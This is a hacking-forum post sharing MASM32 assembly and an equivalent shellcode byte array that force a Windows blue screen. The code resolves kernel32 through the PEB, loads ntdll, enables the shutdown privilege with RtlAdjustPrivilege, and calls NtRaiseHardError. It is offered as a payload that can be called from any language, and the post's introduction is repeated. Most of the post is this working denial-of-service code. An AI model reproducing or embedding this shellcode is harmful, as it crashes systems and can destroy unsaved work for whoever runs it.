Force Bluescreen | Shellcode + Masm32 | Windows 10-19-2016, 12:18 AM
#1
Yo.
So I was toying around with shellcode and figured this was something I may need at some point down the line.
I couldn't figure out a good way to store a byte array in a locally defined variable nicely, so I kinda had to hack it together, but still works none the less.
How it do:
1: Get Kernel32 offset
2: Invoke LoadLibraryA to load NtDll
3: RtlAdjustPrivileges
4: NtRaiseHardError
After that, I just disassembled the file and got the opcodes and made them into an array, and you can call it from whatever language you like!
MASM32:
Shellcode:
So I was toying around with shellcode and figured this was something I may need at some point down the line.
I couldn't figure out a good way to store a byte array in a locally defined variable nicely, so I kinda had to hack it together, but still works none the less.
How it do:
1: Get Kernel32 offset
2: Invoke LoadLibraryA to load NtDll
3: RtlAdjustPrivileges
4: NtRaiseHardError
After that, I just disassembled the file and got the opcodes and made them into an array, and you can call it from whatever language you like!
MASM32:
Code:
.386
.model flat, stdcall
option casemap: none
.code
CBO MACRO Base, Off
MOV EAX, Base
ADD EAX, Off
CALL EAX
ENDM
start:
main PROC
LOCAL NTDLL
CALL @F
@@:
POP EAX
JMP @F
DB "ntdll.dll",0
@@:
ADD EAX, 3
MOV NTDLL, EAX
assume fs: nothing ; Get Kernel32 Base
MOV EAX, DWORD PTR fs:[30h]
MOV EAX, DWORD PTR DS:[EAX+0Ch]
MOV EAX, DWORD PTR DS:[EAX+14h]
MOV EAX, DWORD PTR DS:[EAX]
MOV EAX, DWORD PTR DS:[EAX]
MOV EAX, DWORD PTR DS:[EAX+10h]
MOV EDI, EAX
PUSH NTDLL
CBO EDI, 84343 ; LoadLibraryA
MOV EBP, EAX
LEA ESI, [ESP+20]
PUSH ESI
PUSH 0
PUSH 1
PUSH 19
CBO EBP, 729296 ; RtlAdjustPrivilege
LEA ESI, [ESP+20]
PUSH ESI
PUSH 6
PUSH 0
PUSH 0
PUSH 0
PUSH 3290458473
CBO EBP, 136724 ;NtRaiseHardError
RET
main ENDP
end startShellcode:
Code:
.386
.model flat, stdcall
option casemap: none
.data
dat \
db 055h, 08Bh, 0ECh, 083h, 0C4h, 0FCh, 0E8h, 000h, 000h, 000h, 000h, 058h, 0EBh, 00Ah, 06Eh, 074h
db 064h, 06Ch, 06Ch, 02Eh, 064h, 06Ch, 06Ch, 000h, 083h, 0C0h, 003h, 089h, 045h, 0FCh, 064h, 0A1h
db 030h, 000h, 000h, 000h, 08Bh, 040h, 00Ch, 08Bh, 040h, 014h, 08Bh, 000h, 08Bh, 000h, 08Bh, 040h
db 010h, 08Bh, 0F8h, 0FFh, 075h, 0FCh, 08Bh, 0C7h, 005h, 077h, 049h, 001h, 000h, 0FFh, 0D0h, 08Bh
db 0E8h, 08Dh, 074h, 024h, 014h, 056h, 06Ah, 000h, 06Ah, 001h, 06Ah, 013h, 08Bh, 0C5h, 005h, 0D0h
db 020h, 00Bh, 000h, 0FFh, 0D0h, 08Dh, 074h, 024h, 014h, 056h, 06Ah, 006h, 06Ah, 000h, 06Ah, 000h
db 06Ah, 000h, 068h, 069h, 069h, 020h, 0C4h, 08Bh, 0C5h, 005h, 014h, 016h, 002h, 000h, 0FFh, 0D0h
db 0C9h, 0C3h
.code
start:
LEA EAX, dat
end start
(This post was last modified: 10-19-2016, 12:18 AM by Killpot.)
![[+]](https://sinister.ly/images/modern/collapse_collapsed.png)
